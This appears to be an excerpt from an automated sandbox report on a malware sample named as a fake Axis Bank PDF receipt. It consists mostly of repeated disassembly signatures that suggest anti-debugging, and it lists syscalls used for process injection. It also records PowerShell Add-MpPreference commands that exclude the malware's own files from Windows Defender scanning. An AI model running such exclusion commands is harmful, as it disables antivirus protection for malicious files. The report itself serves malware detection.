Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0035C mov eax, dword ptr fs:[00000030h] 10_2_01B0035C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0035C mov eax, dword ptr fs:[00000030h] 10_2_01B0035C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B02349 mov eax, dword ptr fs:[00000030h] 10_2_01B02349
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B5634F mov eax, dword ptr fs:[00000030h] 10_2_01B5634F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B162A0 mov eax, dword ptr fs:[00000030h] 10_2_01B162A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B162A0 mov ecx, dword ptr fs:[00000030h] 10_2_01B162A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B162A0 mov eax, dword ptr fs:[00000030h] 10_2_01B162A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B162A0 mov eax, dword ptr fs:[00000030h] 10_2_01B162A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B162A0 mov eax, dword ptr fs:[00000030h] 10_2_01B162A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B162A0 mov eax, dword ptr fs:[00000030h] 10_2_01B162A0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABE284 mov eax, dword ptr fs:[00000030h] 10_2_01ABE284
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABE284 mov eax, dword ptr fs:[00000030h] 10_2_01ABE284
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B00283 mov eax, dword ptr fs:[00000030h] 10_2_01B00283
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B00283 mov eax, dword ptr fs:[00000030h] 10_2_01B00283
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B00283 mov eax, dword ptr fs:[00000030h] 10_2_01B00283
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A902E1 mov eax, dword ptr fs:[00000030h] 10_2_01A902E1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A902E1 mov eax, dword ptr fs:[00000030h] 10_2_01A902E1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A902E1 mov eax, dword ptr fs:[00000030h] 10_2_01A902E1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B562D6 mov eax, dword ptr fs:[00000030h] 10_2_01B562D6
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A2C3 mov eax, dword ptr fs:[00000030h] 10_2_01A8A2C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A2C3 mov eax, dword ptr fs:[00000030h] 10_2_01A8A2C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A2C3 mov eax, dword ptr fs:[00000030h] 10_2_01A8A2C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A2C3 mov eax, dword ptr fs:[00000030h] 10_2_01A8A2C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8A2C3 mov eax, dword ptr fs:[00000030h] 10_2_01A8A2C3
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7823B mov eax, dword ptr fs:[00000030h] 10_2_01A7823B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B30274 mov eax, dword ptr fs:[00000030h] 10_2_01B30274
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A84260 mov eax, dword ptr fs:[00000030h] 10_2_01A84260
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A84260 mov eax, dword ptr fs:[00000030h] 10_2_01A84260
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A84260 mov eax, dword ptr fs:[00000030h] 10_2_01A84260
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7826B mov eax, dword ptr fs:[00000030h] 10_2_01A7826B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3A250 mov eax, dword ptr fs:[00000030h] 10_2_01B3A250
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B3A250 mov eax, dword ptr fs:[00000030h] 10_2_01B3A250
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B5625D mov eax, dword ptr fs:[00000030h] 10_2_01B5625D
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A86259 mov eax, dword ptr fs:[00000030h] 10_2_01A86259
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B08243 mov eax, dword ptr fs:[00000030h] 10_2_01B08243
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B08243 mov ecx, dword ptr fs:[00000030h] 10_2_01B08243
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7A250 mov eax, dword ptr fs:[00000030h] 10_2_01A7A250
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B005A7 mov eax, dword ptr fs:[00000030h] 10_2_01B005A7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B005A7 mov eax, dword ptr fs:[00000030h] 10_2_01B005A7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B005A7 mov eax, dword ptr fs:[00000030h] 10_2_01B005A7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA45B1 mov eax, dword ptr fs:[00000030h] 10_2_01AA45B1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA45B1 mov eax, dword ptr fs:[00000030h] 10_2_01AA45B1
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB4588 mov eax, dword ptr fs:[00000030h] 10_2_01AB4588
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A82582 mov eax, dword ptr fs:[00000030h] 10_2_01A82582
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A82582 mov ecx, dword ptr fs:[00000030h] 10_2_01A82582
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABE59C mov eax, dword ptr fs:[00000030h] 10_2_01ABE59C
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABC5ED mov eax, dword ptr fs:[00000030h] 10_2_01ABC5ED
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABC5ED mov eax, dword ptr fs:[00000030h] 10_2_01ABC5ED
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A825E0 mov eax, dword ptr fs:[00000030h] 10_2_01A825E0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE5E7 mov eax, dword ptr fs:[00000030h] 10_2_01AAE5E7
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABE5CF mov eax, dword ptr fs:[00000030h] 10_2_01ABE5CF
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABE5CF mov eax, dword ptr fs:[00000030h] 10_2_01ABE5CF
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A865D0 mov eax, dword ptr fs:[00000030h] 10_2_01A865D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABA5D0 mov eax, dword ptr fs:[00000030h] 10_2_01ABA5D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABA5D0 mov eax, dword ptr fs:[00000030h] 10_2_01ABA5D0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE53E mov eax, dword ptr fs:[00000030h] 10_2_01AAE53E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE53E mov eax, dword ptr fs:[00000030h] 10_2_01AAE53E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE53E mov eax, dword ptr fs:[00000030h] 10_2_01AAE53E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE53E mov eax, dword ptr fs:[00000030h] 10_2_01AAE53E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAE53E mov eax, dword ptr fs:[00000030h] 10_2_01AAE53E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B54B00 mov eax, dword ptr fs:[00000030h] 10_2_01B54B00
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A7CB7E mov eax, dword ptr fs:[00000030h] 10_2_01A7CB7E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2EB50 mov eax, dword ptr fs:[00000030h] 10_2_01B2EB50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B52B57 mov eax, dword ptr fs:[00000030h] 10_2_01B52B57
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B28B42 mov eax, dword ptr fs:[00000030h] 10_2_01B28B42
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B16B40 mov eax, dword ptr fs:[00000030h] 10_2_01B16B40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B16B40 mov eax, dword ptr fs:[00000030h] 10_2_01B16B40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B4AB40 mov eax, dword ptr fs:[00000030h] 10_2_01B4AB40
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A78B50 mov eax, dword ptr fs:[00000030h] 10_2_01A78B50
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B34B4B mov eax, dword ptr fs:[00000030h] 10_2_01B34B4B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B34B4B mov eax, dword ptr fs:[00000030h] 10_2_01B34B4B
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A88AA0 mov eax, dword ptr fs:[00000030h] 10_2_01A88AA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A88AA0 mov eax, dword ptr fs:[00000030h] 10_2_01A88AA0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6AA4 mov eax, dword ptr fs:[00000030h] 10_2_01AD6AA4
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A8EA80 mov eax, dword ptr fs:[00000030h] 10_2_01A8EA80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B54A80 mov eax, dword ptr fs:[00000030h] 10_2_01B54A80
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB8A90 mov edx, dword ptr fs:[00000030h] 10_2_01AB8A90
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABAAEE mov eax, dword ptr fs:[00000030h] 10_2_01ABAAEE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABAAEE mov eax, dword ptr fs:[00000030h] 10_2_01ABAAEE
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6ACC mov eax, dword ptr fs:[00000030h] 10_2_01AD6ACC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6ACC mov eax, dword ptr fs:[00000030h] 10_2_01AD6ACC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AD6ACC mov eax, dword ptr fs:[00000030h] 10_2_01AD6ACC
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01A80AD0 mov eax, dword ptr fs:[00000030h] 10_2_01A80AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB4AD0 mov eax, dword ptr fs:[00000030h] 10_2_01AB4AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AB4AD0 mov eax, dword ptr fs:[00000030h] 10_2_01AB4AD0
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AAEA2E mov eax, dword ptr fs:[00000030h] 10_2_01AAEA2E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA24 mov eax, dword ptr fs:[00000030h] 10_2_01ABCA24
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA38 mov eax, dword ptr fs:[00000030h] 10_2_01ABCA38
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA4A35 mov eax, dword ptr fs:[00000030h] 10_2_01AA4A35
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AA4A35 mov eax, dword ptr fs:[00000030h] 10_2_01AA4A35
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B0CA11 mov eax, dword ptr fs:[00000030h] 10_2_01B0CA11
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA6F mov eax, dword ptr fs:[00000030h] 10_2_01ABCA6F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA6F mov eax, dword ptr fs:[00000030h] 10_2_01ABCA6F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01ABCA6F mov eax, dword ptr fs:[00000030h] 10_2_01ABCA6F
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01B2EA60 mov eax, dword ptr fs:[00000030h] 10_2_01B2EA60
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFCA72 mov eax, dword ptr fs:[00000030h] 10_2_01AFCA72
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Code function: 10_2_01AFCA72 mov eax, dword ptr fs:[00000030h] 10_2_01AFCA72
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe"
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
